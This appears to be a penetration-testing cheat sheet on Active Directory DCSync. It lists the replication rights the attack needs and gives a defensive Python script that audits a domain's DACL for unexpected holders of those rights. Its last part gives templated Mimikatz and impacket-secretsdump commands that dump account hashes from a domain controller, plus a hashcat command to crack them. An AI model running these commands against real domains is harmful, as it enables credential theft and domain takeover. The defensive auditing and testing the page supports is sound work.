🔃Domain Controller Synchronization

To perform a DC Sync, the user needs the following rights:

  • Replicating Directory Changes

  • Replicating Directory Changes All

  • Replicating Directory Changes in Filtered Set

By default, members of Domain Admins, Enterprise Admins and Administrators groups have these rights assigned.
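To check which other principals hold these rights, review the DACL on the domain root object. The following is an added example, not part of the original page: it parses an SDDL string and reports trustees outside an expected baseline that are granted any of the three rights. The baseline (the default admin groups plus the domain controller groups), the function names and the sample SDDL are assumptions made for this example; adjust the baseline to your environment.

```python
import re

# Control-access GUIDs of the three replication rights listed above.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "Replicating Directory Changes All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "Replicating Directory Changes in Filtered Set",
}
# Assumed baseline of expected holders: admin groups plus domain controller groups.
EXPECTED_TRUSTEES = {"DA", "EA", "BA", "ED", "DD", "RO", "S-1-5-32-544", "S-1-5-9"}
EXPECTED_RIDS = {"512", "519", "516", "498"}

def codes(field):
    """Split an SDDL flags or rights field into its two-letter codes."""
    return {field[i:i + 2] for i in range(0, len(field), 2)}

def grants_control_access(rights):
    """CR (0x100) or GA (0x10000000) covers extended rights such as replication."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & 0x10000100)
    return bool(codes(rights) & {"CR", "GA"})

def is_expected(trustee):
    return trustee in EXPECTED_TRUSTEES or (
        trustee.startswith("S-1-5-21-") and trustee.rsplit("-", 1)[-1] in EXPECTED_RIDS)

def unexpected_replication_holders(sddl):
    """Map each non-baseline trustee to the replication rights its allow ACEs grant."""
    findings = {}
    for ace in re.findall(r"\(([^()]*)\)", sddl):
        fields = ace.split(";")
        if len(fields) != 6 or fields[0] not in ("A", "OA"):
            continue  # deny, audit and malformed ACEs grant nothing
        _, flags, rights, guid, _, trustee = fields
        if "IO" in codes(flags) or not grants_control_access(rights) or is_expected(trustee):
            continue  # inherit-only ACEs do not apply to the domain object itself
        # An empty object GUID means the ACE covers every extended right.
        granted = [name for g, name in REPL_RIGHTS.items() if guid.lower() in ("", g)]
        if granted:
            findings.setdefault(trustee, set()).update(granted)
    return findings

DOM = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed sample, SIDs made up
SAMPLE_SDDL = (
    "O:DAG:DAD:AI(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOM}-1105)"
    f"(OA;;CR;1131F6AD-9C07-11D1-F79F-00C04FC2DCD2;;{DOM}-1105)"
    f"(A;CI;RPWPCR;;;{DOM}-1130)"
    f"(OA;CIIO;CR;89e95b76-444d-4c62-991a-0facbeda640c;;{DOM}-1140)")
```

On the sample, `unexpected_replication_holders(SAMPLE_SDDL)` reports the account with RID 1105 (two explicit grants) and the account with RID 1130, whose generic ACE carries all extended rights; the inherit-only ACE for RID 1140 is skipped.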

Windows

Using Mimikatz.

lsadump::dcsync /user:$DOMAIN$\$TARGET_USER$

Kali

impacket-secretsdump -just-dc-user $TARGET_USER$ $DOMAIN$/$USER$:"$PASSWORD$"@$DC_IP$

Once the hash has been extracted on Kali or Windows, use hashcat to crack it:

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
